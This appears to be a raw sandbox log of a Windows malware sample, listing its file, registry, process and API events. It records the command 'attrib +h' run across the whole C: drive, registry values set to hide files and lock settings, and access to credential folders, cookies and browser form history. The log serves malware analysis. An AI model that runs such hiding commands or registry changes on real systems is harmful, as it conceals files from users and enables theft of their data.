C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\822B7BDCBB932A278281E2F651429[1].jpg
163214737
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\927[1].png
16323610
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\92B0DB83806125262F3FBC6E76B660[2].jpg
16329164
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\CDAB2F44A1591D2B308C20C6C15375[1].jpg
16327075
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\coUAprint[1].css
16322079
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\df1d7d61446cec7602dc18f98fe3fd[1].css
16324648
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\EB75D45B8948F72EE451223E95A96[1].gif
16322477
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\eolas[1].js
1632381
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\reusable[1].xml
1632686732
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\02208d211b3366ebb915d602e70ebf[1].css
1632129973
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\278E6F62516781EAC1C965D60DC32[1].jpg
16326983
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\4a0253de6eac448d8f2c39c53f8926[2].js
1632554
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\AC980A55DAAAB5589E42E55B24D[1].jpg
16323918
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\anatm[1].js
1632729
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\c57bc2a7d38843d7c4aa8028fc9f82[1].gif
16321142
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\coUA[1].css
163211255
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\defaultsettings[1].xml
1632426
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\ec22e9952c2296e3b17de63cd1bea1f2[1].js
1632155552
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\EC919A7328715FC4E5BBFF2A33D5[1].jpg
16326949
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\ec9da238a81ebb4538a1a066dfdaec[1].css
16323573
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\gap[1]
163244
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\jscript[1]
163262
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\mat_grl_fbsingle_newgirlsgrnsqrrepop_vsgeocity_6ageradio_na_93040_113011_noy_300x120[1].gif
163214962
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\msn[1]
1632104302
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\U07Z9C1V\primedns[1].gif
163243
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\index.dat
163265536
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\AntiPhishing
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp
1632
Folder
Open
C:\Documents and Settings\admin\My Documents
1632
Folder
Open
C:\Documents and Settings\admin\My Documents\My Music
1632
File
Open

Target:      C:\Documents and Settings\admin\My Documents\My Music\Sample Music.lnk
1632638
File
Hide

Target:      C:\Documents and Settings\admin\My Documents\My Music\Sample Music.lnk
1632638
Folder
Open
C:\Documents and Settings\admin\My Documents\My Pictures
1632
File
Open

Target:      C:\Documents and Settings\admin\My Documents\My Pictures\Sample Pictures.lnk
1632668
File
Hide

Target:      C:\Documents and Settings\admin\My Documents\My Pictures\Sample Pictures.lnk
1632668
Folder
Hide
C:\Documents and Settings\admin\My Documents\My Music
1632
Folder
Hide
C:\Documents and Settings\admin\My Documents\My Pictures
1632
File
Hide
C:\Documents and Settings\admin\SendTo\Compressed (zipped) Folder.ZFSendToTarget
1632
File
Hide
C:\Documents and Settings\admin\SendTo\Desktop (create shortcut).DeskLink
1632
File
Hide
C:\Documents and Settings\admin\SendTo\Mail Recipient.MAPIMail
1632
File
Open
C:\Documents and Settings\admin\SendTo\My Documents.mydocs
1632
File
Hide
C:\Documents and Settings\admin\SendTo\My Documents.mydocs
1632
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Accessibility\Magnifier.lnk
16321525
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk
16321532
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Accessibility\On-Screen Keyboard.lnk
16321501
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Accessibility\Utility Manager.lnk
16321539
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Entertainment\RealPlayer.lnk
1632725
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Entertainment\Windows Media Player.lnk
1632804
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk
1632833
Folder
Hide
C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Accessibility
1632
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Address Book.lnk
1632774
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Command Prompt.lnk
16321555
Folder
Hide
C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Entertainment
1632
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Notepad.lnk
16321519
File
Hide
C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Program Compatibility Wizard.lnk
1632386
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Synchronize.lnk
16321519
Folder
Hide
C:\Documents and Settings\admin\Start Menu\Programs\Accessories\System Tools
1632
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Tour Windows XP.lnk
16321527
API Call
  API Name:  Sleep   Address:  0x774f2fcb
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Accessories\Windows Explorer.lnk
16321487
Folder
Hide
C:\Documents and Settings\admin\Start Menu\Programs\Accessories
1632
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Internet Explorer.lnk
1632803
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Outlook Express.lnk
1632738
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Remote Assistance.lnk
16321599
Folder
Hide
C:\Documents and Settings\admin\Start Menu\Programs\Startup
1632
File
Hide

Target:      C:\Documents and Settings\admin\Start Menu\Programs\Windows Media Player.lnk
1632792
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Folder
Hide
C:\Documents and Settings\admin\Start Menu\Programs
1632
File
Hide
C:\Documents and Settings\admin\Templates\amipro.sam
16324570
File
Hide
C:\Documents and Settings\admin\Templates\excel.xls
16325632
File
Hide
C:\Documents and Settings\admin\Templates\excel4.xls
16321518
File
Hide
C:\Documents and Settings\admin\Templates\lotus.wk4
16322448
File
Hide
C:\Documents and Settings\admin\Templates\powerpnt.ppt
163212288
File
Hide
C:\Documents and Settings\admin\Templates\presenta.shw
1632461
File
Hide
C:\Documents and Settings\admin\Templates\quattro.wb2
16324017
File
Hide
C:\Documents and Settings\admin\Templates\sndrec.wav
163258
File
Hide
C:\Documents and Settings\admin\Templates\winword.doc
16324608
File
Hide
C:\Documents and Settings\admin\Templates\winword2.doc
16321769
File
Hide
C:\Documents and Settings\admin\Templates\wordpfct.wpd
163230
File
Hide
C:\Documents and Settings\admin\Templates\wordpfct.wpg
163257
Folder
Hide
C:\Documents and Settings\admin\Desktop
1632
Folder
Hide
C:\Documents and Settings\admin\Favorites
1632
Folder
Hide
C:\Documents and Settings\admin\My Documents
1632
Folder
Hide
C:\Documents and Settings\admin\Start Menu
1632
Mutex
  Imagepath:  C:\WINDOWS\system32\attrib.exe
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Accessibility
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Communications
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Entertainment
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools
352
Process
Terminated
C:\WINDOWS\system32\attrib.exe
  Parentname:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
  Command Line:  N/A
16321436
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\Extras\AutoItX
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3\Extras
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Office\Microsoft Office Tools
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Real\RealPlayer
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Accessories
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\AutoIt v3
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Debugging Tools for Windows (x86)
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Games
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Office
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Mozilla Firefox
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\QuickTime
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Real
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
352
Folder
Hide
C:\Documents and Settings\All Users\Start Menu\Programs
352
Process
Terminated
C:\WINDOWS\system32\attrib.exe
  Parentname:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
  Command Line:  N/A
3521436
Process
Started
C:\WINDOWS\system32\attrib.exe
  Parentname:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
  Command Line:  attrib +h "C:\*.*" /s /d
4601436
Mutex
  Imagepath:  C:\WINDOWS\system32\attrib.exe
460
File
Hide
C:\bin\a.dll
460917504
Malicious  Alert
Misc  Anomaly
Message:   System file hiding observed    Detail:   Malware hiding newly created exe/dll/sys file   
File
Hide
C:\bin\apimon-1108.log
  MD5:  c5bcb19feb4f03328bb8c398ee7ff6d4
  SHA1: ab16894a282d66036858375a528eadcc82a569ae
4603994
File
Hide
C:\bin\apimon-1208.log
  MD5:  7445b16a2ecc494347c20e90333dcceb
  SHA1: fa3b1062076e3488e2dd5597b80d04ee5238dc5a
46068866
File
Hide
C:\bin\apimon-1228.log
  MD5:  7fc14e5aa031e1ff06d169a787f4ca3f
  SHA1: 05d086b634bf70eb401a8a8402568d130ad67b4f
46068755
File
Hide
C:\bin\apimon-1436.log
4603754
File
Hide
C:\bin\apimon-1564.log
46070029
File
Hide
C:\bin\apimon-1632.log
  MD5:  d98c0c916b5182230baf75ef1b8d2551
  SHA1: ed2defd0af03f397ab21dac885b0e09dffbf6105
46068755
File
Hide
C:\bin\apimon-1652.log
46069036
File
Hide
C:\bin\apimon-2004.log
  MD5:  5fc0df0f15abae51ed0298f5b3480900
  SHA1: d164de41ac5189448d4f1ff99ebdccc41008bcb3
46055120
File
Hide
C:\bin\apimon-2044.log
  MD5:  6a077a0f14afcef5fd39d3021b284c58
  SHA1: 01d57b2f743025716c69610d7959c42a7636b861
46055009
File
Hide
C:\bin\apimon-352.log
  MD5:  da0e7324b0b5b6cda625813242b7e71a
  SHA1: f6165ccce3cd24f0c0a4cc770e0cab3069869840
46068755
File
Hide
C:\bin\apimon-460.log
46068461
File
Hide
C:\bin\apimon-660.log
46069144
File
Hide
C:\bin\apimon-756.log
  MD5:  97178179d6552ae7731e7a75fded231d
  SHA1: 8ed70289449c0a79e2dfe9e02d0abc1376312f76
46069438
File
Hide
C:\bin\apimon_logging.conf
4601795
File
Hide
C:\bin\autolaunch.au3
4606971
File
Hide
C:\bin\autorun.bat
46017
File
Hide
C:\bin\autorun.inf
46033
File
Hide
C:\bin\configure.js
4605853
File
Hide
C:\bin\confutil.exe
46019968
File
Hide
C:\bin\crash-config.xml
4604097
File
Hide
C:\bin\crashdetection.cfg
46018643
File
Hide
C:\bin\custom.au3
460748
File
Hide
C:\bin\devcon.exe
46055808
File
Hide
C:\bin\dh.dll
4601080656
File
Hide
C:\bin\dlltester_logging.conf
4601387
File
Hide
C:\bin\dynamic-ip.cmd
460128
File
Hide
C:\bin\el.log
4603149
File
Hide
C:\bin\el_logging.conf
4603082
File
Hide
C:\bin\eventlog-winxp.exe
4601032192
File
Hide
C:\bin\firemon.sys
46086784
File
Hide
C:\bin\gi_autoinit.bat
4601169
File
Hide
C:\bin\netmon-1108.log
  MD5:  df041d8f5bbb14028bad22baa53a7050
  SHA1: 1973955ba0fc5c9f3f2883d65388e9b03ec93878
460120
File
Hide
C:\bin\netmon-1564.log
460120
File
Hide
C:\bin\netmon-2044.log
  MD5:  f2ffc4e3ab37a9fd16072c882a1754ab
  SHA1: a19e48bba17ee3fa383c8f573f37a6afc9cbbd45
460120
File
Hide
C:\bin\netmon-660.log
460120
File
Hide
C:\bin\netmon.dll
460753664
File
Hide
C:\bin\netmon_logging.conf
4601391
File
Hide
C:\bin\office.bat
4602
Folder
Hide
C:\bin\old-log
460
File
Hide
C:\bin\plistcom.exe
46077824
File
Hide
C:\bin\sleep.exe
46023040
File
Hide
C:\bin\sysmsg.dll
4607168
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\System\"DisableTaskMgr" = 0x00000000
1436
Malicious  Alert
Misc  Anomaly
Message:   6+ startup registry key sets    Detail:   Malware setting 6+ startup registry keys   
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\"DisableTaskMgr" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"Hidden" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"ShowSuperHidden" = 0x00000000
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\"HidNoChangingWallPaperden" = 0x00000001
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\"EnableAutoTray" = 0x00000000
1436
Folder
Open
C:\Documents and Settings\admin\Application Data\Microsoft\Credentials
460
Folder
Open
C:\Documents and Settings\admin\Application Data\Microsoft\Credentials\S-1-5-21-1409082233-688789844-725345543-1003
460
File
Open
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\cookies.sqlite
4602048
File
Open
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\formhistory.sqlite
4604096
Folder
Open
C:\Documents and Settings\admin\Cookies
460
File
Open
C:\Documents and Settings\admin\Cookies\admin@ad.wsod[2].txt
460176
File
Open
C:\Documents and Settings\admin\Cookies\admin@atdmt[2].txt
460180
File
Open
C:\Documents and Settings\admin\Cookies\admin@bing[2].txt
460192
File
Open
C:\Documents and Settings\admin\Cookies\admin@c.atdmt[2].txt
460198
File
Open
C:\Documents and Settings\admin\Cookies\admin@c.msn[1].txt
46067
File
Open
C:\Documents and Settings\admin\Cookies\admin@match[2].txt
460174
File
Open
C:\Documents and Settings\admin\Cookies\admin@microsoft[1].txt
460108
File
Open
C:\Documents and Settings\admin\Cookies\admin@msn[1].txt
460584
File
Open
C:\Documents and Settings\admin\Cookies\admin@scorecardresearch[2].txt
460195
File
Open
C:\Documents and Settings\admin\Cookies\admin@www.bing[1].txt
460111
File
Open
C:\Documents and Settings\admin\Cookies\admin@www.msn[2].txt
460230
File
Open
C:\Documents and Settings\admin\Cookies\index.dat
46032768
Folder
Open
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Credentials
460
Folder
Open
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-1409082233-688789844-725345543-1003
460
File
Delete
C:\Documents and Settings\admin\Recent\Desktop.ini
1436150
Folder
Delete
C:\Documents and Settings\admin\Recent
1436
Regkey
Added
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\RecentDocs
1436
Folder
Created
C:\Documents and Settings\admin\Recent
1436
Folder
Hide
C:\Documents and Settings\admin\Recent
1436
File
Created
C:\Documents and Settings\admin\Recent\Desktop.ini
1436
File
Close
C:\Documents and Settings\admin\Recent\Desktop.ini
  MD5:  0cf1a1d4f128bc07491b37335dec6b62
  SHA1: 239f28dc142ee322133f4dc238060ed7c962e4eb
143648
File
Open
C:\Documents and Settings\admin\Recent\Desktop.ini
  MD5:  0cf1a1d4f128bc07491b37335dec6b62
  SHA1: 239f28dc142ee322133f4dc238060ed7c962e4eb
143648
File
Close
C:\Documents and Settings\admin\Recent\Desktop.ini
  MD5:  9f26352708c846c5e999a41462adbd91
  SHA1: dd2051f5eb70837d607e0203f01722f33f350b01
143692
File
Close
C:\Documents and Settings\admin\Recent\Desktop.ini
  MD5:  39533c1b57a057448960e9a132252bc3
  SHA1: cf664abe03c652193b421f84e4028068cdb3b6eb
1436107
File
Hide
C:\Documents and Settings\admin\Recent\Desktop.ini
  MD5:  39533c1b57a057448960e9a132252bc3
  SHA1: cf664abe03c652193b421f84e4028068cdb3b6eb
